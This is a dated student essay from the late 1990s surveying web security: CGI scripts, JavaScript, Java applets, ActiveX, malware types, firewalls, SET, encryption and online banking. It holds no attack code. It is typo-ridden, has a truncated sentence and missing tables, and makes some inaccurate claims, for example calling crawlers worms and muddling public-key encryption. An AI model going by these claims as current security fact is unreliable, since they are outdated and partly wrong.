How secure is Web software and internet commerce???
by Mageshkumar.


Abstract

Today the worldwide web is the hottest example of distributed information, electronic commerce(transaction) and publishing. It can be simultaneously global and local, complex and easily extensible, and co-operate and personal. The basic tools available and organisation allow anything formn a simple one-side setup to a link to the worldwide community.

Despite this ease in connectivity to the www and access to a prodiguous amount of information reasources contained in servers universally distributed, inadequate secuturity is the biggest challenge to making internet a commercial market place. With frequent news of the legion security breaches on the net, it is understandable that many buisness and companies are uneasy in conducting their transactions online.

This article, consequently, analyses these security concerns, and some software techniques available to circumvent them. More specifically, the insecurity of existing and new internet programming languages is investigated, together with the risk posed by software such as worms etc., to the net. Furthermore, the software methodologies at hand such as encryption is disscussed. Finally, two general internet services, email and an online commerce example - online banking, is briefly described.

Overview

The trend towards information distribution

Issues of security w.r.t. web software

Other security risks caused by malcious software

Internet Commerce - Security

Electronic Banking

Security in electronic mail

References

The trend towards information distribution

The meteriotic rise of computer networks has ignited a coressponding rise of interest in distributed computing. This discipline is concerned with the problems of software, i.e. programs, information, and data contained across multiple computers connected together and spread around. Distributed computing includes issues of interprocess communication, concurrent processing, data sharing and replication, and security.

By implementing several protocols for information and reasource sharing, the above issues were satisfactorily met. They consitute cardinally of:

Although the internet is the most well known distributed enviornment, it is just in the earlier stages of using the full potential of distributed computing. The existing client/server approach went some way in allowing many users with different computing platforms to share reasources. But until recently, for instance, there has been no solution to the problem of dynamically loading an applilcation both efficiently and securely. (Efficiency, security, and reliability are three objectives to be met in distributed enviornments.)

Issues of security with respect to web software

This can be discussed under two headings:

  • Web scripting languages

  • Internet programming languages.

  1. Web scripting languages

    • CGI scripts

      CGI scripts were the first attempt at network programming. Here, interactive communication between the client and server was possible. For example, the client could submit a form to a remote server for processing, say, for collecting user views. The problem here was the execution of the CGI scripts on behalf of the client in the server. This presents problems such as:

      1. if the script itself is not robust, it could cause the server to crash.
      2. a malacious CGI script could
        - mail out the systen password file
        - use unauthorized reasources
        - get access to privelged information

      Hence, the above two problems togehter with the performance degradation due to the server deppenadant processing, does not necessarily indicate CGI scripts as an answer to distributed computing. Perl CGI scripts attempted to improve protection.
      Examples of bugged CGI scripts can be found at the excellent WWW security FAQ - Q34.

      If programs can be downloaded and executed on the browser, then can such programs be incorperated right within the HTML documents?

    • JAVASCRIPT and VBSCRIPT are two scripting languages aimed at enabling some dynamism into the static HTML documents. It was an attempt to off-load some processing into the client. For example, validation of user input can be checked on the client side thus reducing inefficiency and performance degradation at the server and network.

      1. Javascript - devolped by Netscape Communications Inc. in association with Sun Microsystems Inc. It is quite distinct form Java in many ways. Provides features for manupulating form elements, opening and closing windows, downloading and executing Java applets and ActiveX components etc.

        As now scripts execute on the client side, the security risk at the client end is greater. There were many security loopholes in the earlier versions of Netscape such as - ability to trick the user into transferring of data from his hard disk to remote servers

        • ability to expose directory contents and other client side information
        • monitoring of locations and reasources accessed by a client and exposing them etc.

        These problems have been fixed in Netscape version 3.0. But there still continu$ to exist one problem, that is, the emailing of messages without user knowledge.
        More information is availabe at http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html#contents

      2. VBscript - developed by Microsoft as a quick follow up to Netscape's Javascript. It is closer in design to visual basic.

      As CGI has been around for some time, is is understandable that network programmers are in secure about moving over to the new scripting languages. Although, these employ object-oriented techniques, the unknown bugs that can crop up, psycologically limits the users from chaning over. Furthermore, the incompatiblity between Netscape and Miscrosft internet explorer, seems to increase this fear as clients would be working in a mixed-platform enviornment. Of course, is the user wants to produce mathematical or scientific documents, it is essential for him to use the LaTeX/TeX scripting language inorder to use its wide range of mathematical symbols, and then convert it into HTML.

  2. Internet programming languages

    The latest ones are:

    1. Java
    2. ActiveX

    These were an attempt to solve the problems of distributed computing via the web by increasing performance as a consequence of downloading executable programs to the client, to be executed in the client.

    • Java - developed by Sun Microsystems Inc.

      Java's unique combination of a programming language, compiler, and runtime enviornment provides a general architecture well suited for addressing the concerns plaguaging the computing community. Its portablilty where special java executable programs called appletes can be automatically downloaded and executed on the client's machine, irrespective of its paltform.

      But with this ease of downloading and access brings with it considerable security risks to the client. Security in Java concers with restricting the freedom of applets to initiate network communication and access sensitive data on the client machine. Further more, security can be enforced by Java-capable browsers by setting the level of access. The Java languages can enforce this by allowing the applet the freedom upto the set level. The four classes of attacks due to executable content in general can be summarized in the table below:

      Most have been fixed in the latest version of Netscape(ver 3.0).
      For more information try http://www.genome.wi.mit.edu/WWW/faqs/www-security-faq.html#contents-Q9

    • ActiveX is an object-embedded technology pursued by Microsoft Cooperation in response to Java, aimed for creating plug-ins or ActiveX controls for the Internet explorer. Users of PCs with windows/mac can now connect upto the internet.

      ActiveX security model is completely different from Java.

      • Java implements security by restricting the freedom of applets to access data and communicate.

      • ActiveX controls have no restriction to what they can do. Thus, the systems security is in the hands of the client. The browser can download controls that have been 'digitally signed' by a certified devolper whose signature has been registered with a trusted authority like VeriSign. Hence, if the downloaded control does damage the client's security, the owner of the control is at least$ download unsigned controls, of course, at their own risk.

      There are problems with this model of security, as can be inferred from above. Obviously, the main one would be due to unsinged malacious controls downloaded by naive users. This was shwon by the Exploder control which shuts down windows systems once downloaded. It is also claimed that controls that are difficult to track cause more damage. For example, controls that expose sensitive information or plant a virus etc.

It would behoove that none of the above available solutions are risk free. This is the assumption on which software devolopment is based. Consequently, it is very difficult to judge which is better.(It is not possible to say whether Java is more secure than ActiveX). Sometimes, it is common for new products and versions to appear in an attempt to fill security gaps, such as WebCrusader from Gradient technologies(to authenticate users, and internal and ecxternal servers in a registry, providing fine grained control). But these too may contain bugs. In view of these risks, developers and network programmers tend to stick to the languages they are used to. As for now, Java is in the lime light. Inadvertenly, if devolopers are looking for powerful and satisfactory web applications, they have a trade off against securtiy. They may be left with no choice.

Other security risks caused by malcious software

  • Internet Worms also called spiders or wanderers. Their target is to wander through the web without human intervention, and autonomously extract and index web documents. There is a chance for the leakage of information when worms access senstive documents. Its access can be limited by following the standard for robot exclusion(SRE), where the administrator can enforce limited access.

  • Viruses these are the regular malacious programs, which are craftily witten, and causes alot of damage to the system after downloading an infected document.

  • Other types like logic bombs which are code embedded in legitmate programs that 'explode' when certain conditions are met, Trojan horses are apparently useful programs bu contain some malacious hidden code, and Bacteria which do not cause any damage by overloading server reasources by exponential replication.

Internet Commerce - Security

The WWW is changing the way the companies and businessess interact. Already, there are a significant number of companies such as banks and credit-card companies the web as the future tool of conducting buisness. What will be the most sweeping changers brought on by an electronis company? Money no may be controlled exclusively by central authorities like the U.S. treasury, in its place will be digital currency or cybercash 'minted' by companies responsible for keeping it secure and valuable. Cash, checks, coupons, paper forms etc. are all going digital.

But what prevents from a majoruty change over to this new method of working is security. Four technological issues to be resolved in for wide scale acceptance are:

  • Security: for online transctions, transferring funds, and electric currency.
  • Authentication : verfication of the participants involved on a transaction
  • Anonymity: to assure that consumers, merchants, and transcations themselves remain confidential.
  • Divisability: this concerns the size of the denomination of diagital currency inorder to carry out high volume, smnall value transctions.

Today there are 2 basic approaches to secure electronic commerce.

  1. The first focusses on securing servers and network sites to protect its reasources by means of 'perimenter security'. For e.g. Firewalls - these are software that are used to protect a LAN or intranet, by placing them inbetween the private networks and other networks to which it is connected. This connection is via a gateway server in which the firewall is implemented, thus providing a 'choke' point to provide access control. Installing proxy servers enables the inside users to access outside their perimeter. But unfortunately firewalls cannot protect against attacks that do not go through the firewall.

  2. Focussess on transcation security.
    This addresses prevention of 'sniffers', authentication of all parties invovled in the transaction, message intergrity to prevent message tampering, and a nonrepudiable record of the transaction.

    • Prevention of 'sniffers' means that transaction details such as credit card details during online transcations employ channel and document based security, to prevent evasdropping. Internet commerce should conform to one of a set of standards which specify how data is communicated during online transactions. The most popular standard is the Secure electronic transaction standard(SET). It specifies data encryption before transmission.

      Encryption involves the conversion of palin text into unintelligible form by means of a reversible translation that is based on a translation table or algorithm. The three main types of transaction dat encryption is given in the table below:

      Public key encryption Private key encyption Data encryption standard(DES)
      uses two keys, a private key private to a user, and a public key that the user can freely distribute. The customer encrypts the data using his private key and the merchants public key. Due to a mathematical realtionship between the private and public key, only the merchant can use his private key to de-encrypt the data. Visa International and Mastercard are spearheading RSA public key encryption standard. This is further purported by Netscape and Microsoft. Of course the strength of this method depends on how secure the private keys is. MIT's Kerberos encryption is an example. Here communication is via a Kerberos server, inbetween the customer and merchant. The latter two systems share a secret key with the server, to encrypt and protect the data. This method is not so secure as the public-key method, and depends on the server not being breached. NetCheque, developed at the Information Science Institute of the University of Southern Carlifornia, uses Kerberos to authenticate signatures on electronic checks that Internet users have registered with an accounting server. uses a 56-bit number to encode palin text. Both parties share this key number. Unless the shared scret key is compromised, it is claimed that the 56-bit key would take aprrox. 2,691.49 years to crack on Unix based computers.

    • Since, in global internet commerce, the parties involved may not know each other, it is necessary to validate authentication of both parties. The SET standard used certificate authororites(CA) which are financial instituitions like VeriSign or FirstVirtual systems, to act as third parties for the transactions. The CA authenticates clients by issuing them with certificates that are digitally authorised by the CA and which contains a secure digital signature. The client can then use this signature in online transctions, such as signing NetCheques. Dual signatures provide a higher level of security.

    • The third component of the electronic infrastructure is anonymity, and deals with providing freedom of privacy to online transactions. Anonymity has risen because electronic commerce involves digital cash. The companies involved could easily accumulate client transactions data and spending habits, without client knowledge, in coperate databases. Blind signatures, a technique pursued by DigiCash, to provide anonymity to digital cash involves the encoding of the digital cash serial numbers with different keys such that digital cash issued would be valid in a bank, but the bank cannot trace how it is used.

    Security, authentication, and anonymity all have reasearches working to produce the collective answers necessary to open the flood gates for internet commerce, in the next 12 to 24 months. Some people in the industry have taken a cynical view that technical problems, and the growing sophistication of hackers, will keep internet commerce from succeeding.This attitude takes no account of the benefits it can offer such as 24-hour transactions, cost savings for consumers and merchants, no queueing up in banks, etc. Hence, these efficiencies will motivate developers to an electronic commerce world.

    A typical internet commerce application:Elelctronic Banking

    Electronic banking is the use of the www to do everyday bank transactions such as:

    • open bank account live
    • ability to look through your account via the www
    • ability to write electronic cheques live where the cheques are digitally signed and use SET standard encryption
    • remote access to bank account and services

    Such banks which offer these are BankNet(world's first), Hudson bank, etc. (all based in the U.S.). There are companies which setup the service in banks. For e.g. Summit Reasearch Co., whose electronic banking system includes all the hardware(web server, database serer, network hardware) and software for the complete system.

    Security in Electronic Mail

    The email system is the most widely and frequently used network-based service in any distributed system, across all architectures and vendor platforms. Companies must communicate with customers and other businesses.Hence, this calls for authentication and confidentiality, the key in email security.There are several schemes for email security on the net.One such scheme is the privacy enhanced mail(PEM) which is a draft internet email applications standard.It specifies mail encryption.


    References



    Byte International Magazine
    Issues:Apr 95, Aug 95, Sep 96, Nov, 96,Feb 97, Mar 97,
    May 97,

    Network and internetwork security, principles and practise
    Author(s): William Stalling


    HTML Source book, 3rd edition
    Author(s): Ian S.Graham


    The WWW security FAQ Location=http://www.genome.wi.mit.edu/WWW/faqs/www-security-faq.html#contents


    Top Surprise Home

    Please e-mail suggestions to MageshKumar
    mmp@doc.ic.ac.uk